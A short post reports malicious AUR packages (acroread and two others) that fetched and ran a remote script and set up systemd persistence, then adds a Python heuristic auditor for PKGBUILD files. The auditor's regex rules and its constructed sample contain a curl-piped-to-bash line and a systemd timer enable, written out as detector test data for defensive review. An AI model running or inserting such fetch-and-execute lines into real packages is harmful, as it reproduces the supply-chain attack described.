Malware found in the Arch Linux AUR repository
Here's a report in Sensors Tech Forum on the discovery of a set of hostile
packages in the Arch Linux AUR repository system. AUR contains
user-contributed packages, of course; it's not a part of the Arch
distribution itself. "The security investigation shows that a
malicious user with the nickname xeactor modified on June 7 an orphaned
package (software without an active maintainer) called acroread. The
changes included a curl script that downloads and runs a script from a
remote site. This installs a persistent software that reconfigures systemd
in order to start periodically. While it appears that they are not a
serious threat to the security of the infected hosts, the scripts can be
manipulated at any time to include arbitrary code. Two other packages were
modified in the same manner." This thread in the aur-general list shows the
timeline of the discovery and response.
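
The behaviour the report describes (a build script that fetches a remote script and runs it, plus systemd changes for persistence) can be flagged for manual review before building an AUR package. The following is an added example, not code from the report or from Arch; the rule set, the `audit` function and the sample text with its `example.invalid` URLs are constructed for illustration.

```python
import re

# Heuristic rules for reviewing an AUR PKGBUILD or .install file before building.
# A match only marks the line for manual review; it is not proof of malice
# (many legitimate packages install systemd units, for instance).
RULES = [
    ("fetch-piped-to-shell",
     re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")),
    ("shell-runs-fetched-output",
     re.compile(r"\b(ba|z|da)?sh\b\s+(-c\s+)?[\"']?(\$\(|<\(|`)\s*(curl|wget)\b")),
    ("systemd-persistence",
     re.compile(r"systemctl\s+(--\S+\s+)*(enable|start)\b|/systemd/system/|\.timer\b")),
]

def audit(text):
    """Return (line_number, rule_name, line) for each line that needs review."""
    findings = []
    for number, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # skip blank lines and whole-line comments
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append((number, name, line))
    return findings

# Constructed sample, not the content of any real package.
SAMPLE_PKGBUILD = """\
pkgname=example-viewer
pkgver=1.0
source=("https://example.invalid/example-viewer-1.0.tar.gz")
# curl https://example.invalid/x | bash   (commented out, ignored)
package() {
  install -Dm755 viewer "$pkgdir/usr/bin/viewer"
  curl -s https://example.invalid/setup | bash -
  systemctl enable --now example-update.timer
}
"""

if __name__ == "__main__":
    for number, name, line in audit(SAMPLE_PKGBUILD):
        print(f"line {number}: {name}: {line}")
```

Run it over the PKGBUILD and any `.install` file shown in the package's diff before building, and read every flagged line by hand.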
